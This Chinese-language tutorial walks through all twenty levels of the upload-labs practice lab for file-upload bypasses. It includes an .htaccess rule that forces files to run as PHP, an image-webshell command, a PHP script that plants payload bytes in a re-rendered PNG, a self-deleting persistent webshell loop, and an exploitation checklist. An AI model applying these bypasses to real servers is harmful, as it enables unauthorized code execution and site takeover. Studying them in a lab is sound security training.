漏洞介绍
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。一般都是指“上传Web脚本能够被服务器解析”的问题。
漏洞详解
我们的测试平台:upload_labs
环境:phpstudy2016 强烈建议用2016 会方便很多
第一关:前台js验证
我们上传文件会被前端拦截
右键查看网页源代码,发现在上传时候调用了checkFile方法进行了检查,如果检查失败会返回false导致上传失败
三种解决方法
其实是4种,但是禁用前端js可能造成很多麻烦我们去掉这种
抓包修改文件类型
将shell的后缀改为jpg绕过前端验证,抓包时在改回php
burp修改response返回值
刷新第一关页面,burp抓包拦截response包
将onsubmit直接删除,或者将checkFile改为return true都可以绕过
通过保存源代码修改action
原来网页代码是没有action的,如果没有action默认就是发送到本页面,我们修改function然后添加一个action就可以上传成功
第二关:content-type类型绕过
这关判断了content-type类型,如果满足才可以上传否则就会出错
抓包将修改类型上传成功
第三关:黑名单验证绕过
在这之前修改apache下的httpd.conf文件,将这条的注释去掉,代表php文件 phtml文件都可以解析为php ,当然我们也可以自己添加文件类型
我们看一下源码
因此我们可以上传phtml来绕过黑名单验证
第四关:.htaccess绕过
这关的源码其实和上一关相同,只不过出现了许多黑名单
修改配置文件,原本是none改为all,重启apache
我们首先上传一个名字为.htaccess的文件
<FilesMatch "4"> //意思为和这个文件同目录的文件,只要名字中带有4都会被当做php解析
SetHandler application/x-httpd-php
</FilesMatch>
上传文件名为114.png文件,带有4所以被解析成php
第五关:大小写绕过
第五关源码:
对比第三关源码少了一个大小写转换
由于他没有禁止大写,直接大写后缀上传
第六关:后缀去空绕过
这关源码因为没有去掉最后的空格,因此在和数组进行比较时会匹配失败,导致上传成功,上传上的文件因为系统会自动把后边的空格去掉,形成一个可以解析的php后缀
burp抓包多加一个空格
上传成功
第七关:后缀加点绕过
和第六关思路一样,绕过之后系统会自动把点去掉
第八关:::$DATA绕过
在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名
网站没有过滤::$DATA,我们可以绕过
第九关:双写.(空格).绕过
这关把所有的都验证了,但是他是顺序执行只执行了一次 我们在shell.php后加上.(空格). 先删除一个点,然后最后去除空格,但是前面还有一个点没有去掉,导致绕过
第十关:双写绕过
将文件名和数组中进行匹配,如果匹配上则把匹配内容改位空字符串
我们可以双写php绕过 pphphp
其实上面这几关全部可以用php..绕过,但是大家还是老老实实的用应该的方法练习一遍最好
第十一关:GET %00截断绕过
00截断是当程序遇到00时会自动停止不再解析之后的内容,试用php5.3一下的版本,我们把版本切换到5.2.17
踩坑:需要把magic_quotes_gpc参数关闭,注意默认就是关闭的!!但是我尝试了还是不能成功,如果你也遇到这种情况,咱们打开之后再给他关闭一下就可以了。
上传路径可控,修改上传路径00截断上传成功
因为是根据上传路径拼接的,所以不能在文件名的地方进行00截断
第十二关:POST %00截断绕过
这次的上传路径地址是post方法发送的
get和post的区别就是get能自动url解码,而post却不能,因此我们要在burp里对%00进行解码
上传成功
十三、十四关:图片马配合文件上传漏洞
使用命令生成图片马
copy a.jpg /b + cc.php /a shell.jpg
上传成功之后使用include.php文件包含成功
十五关:和13、14关相同
操作一样。但是需要打开php_exif,本函数可用来避免调用其它 exif 函数用到了不支持的文件类型上或和 $_SERVER['HTTP_ACCEPT'] 结合使用来检查浏览器是否可以显示某个指定的图像。
十六关:二次渲染绕过
imagecreatefrompng PNG 文件或 URL 新建一图像
二次渲染就是我们上传图像之后,发现图片某些位置被删除了,导致我们的命令不能成功执行,于是我们要把渲染过后的文件保存出来,使用16进制编辑器和没渲染的位置进行对比,找到不变的位置,在这里插入我们的恶意代码
我们上传图片马之后发现已经解析失败了
渲染后的文件
渲染前的文件
但是手工插入很难成功,我们使用脚本
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
我们找到php 目录 执行 php 1.php 就会给我们生成一个1.png文件
010editor打开
之后使用这种形式传参就可以成功执行命令
十七关:条件竞争漏洞
需要用到不死马
<?php
ignore_user_abort(true);
set_time_limit(0);
@unlink(__FILE__);
$file = '555.php';
$code = '<?php phpinfo();?>';
while (1){
file_put_contents($file,$code);
usleep(5000);
}
?>
我们看代码他是先将图片上传上去,才开始进行判断后缀名、二次渲染。如果我们在上传上去的一瞬间访问这个文件,那他就不能对这个文件删除、二次渲染。这就相当于我们打开了一个文件,然后再去删除这个文件,就会提示这个文件在另一程序中打开无法删除。
由于代码是先移动文件位置在对文件做判断,我们可以使用Burp不停抓包,利用判断之前的间隙运行成功不死马
一个用于访问路径,一个用于上传,返回值200表示已经生成好了内存马
十八关:条件竞争漏洞配合解析漏洞
和十七关相同,只不过要用解析漏洞的路径
十九关:move_uploaded_file()特性绕过
move_uploaded_file()有这么一个特性,会忽略掉文件末尾的 /.
所以我们把他修改为如图所示
成功访问
第二十关:数组绕过
问题出在这里,reset是获取第一个元素
但是如果我们传的参数为
$file=>{
'0'=>'upload20.php/'
'2'=>'jpg'
}
php的数组既可以当数组又可以当字典,这里其实是字典的用法
这时候呢reset函数取出第一个值是upload20.php 和点拼接 然后count获取长度为2 ,然后2-1为1 但是file数组中没有Key值为1的数字,所以返回为空 所以文件名为upload20.php/ 而$ext获取的是最后面的值因而为jpg也绕过了判断
上传成功
总结
条件: 寻找一个上传点,查看上传点是否可用。
利用: 首先判断是程序员自己写的上传点,还是编辑器的上传功能 如果是编辑器上传功能,goolge当前编辑器的漏洞 如果是程序员写的上传点 上传一个正常的jpg图片 查看上传点是否可用 上传一个正常的jpg图片,burp拦截,修改后缀为php (可以检测前端验证 MIME检测 文件内容检测 后缀检测) 上传一个正常的jpg图片,burp拦截, 00截断 1.php%00.jpg 判断服务器是什么类型,web服务器程序,是什么类型,版本号多少 利用解析漏洞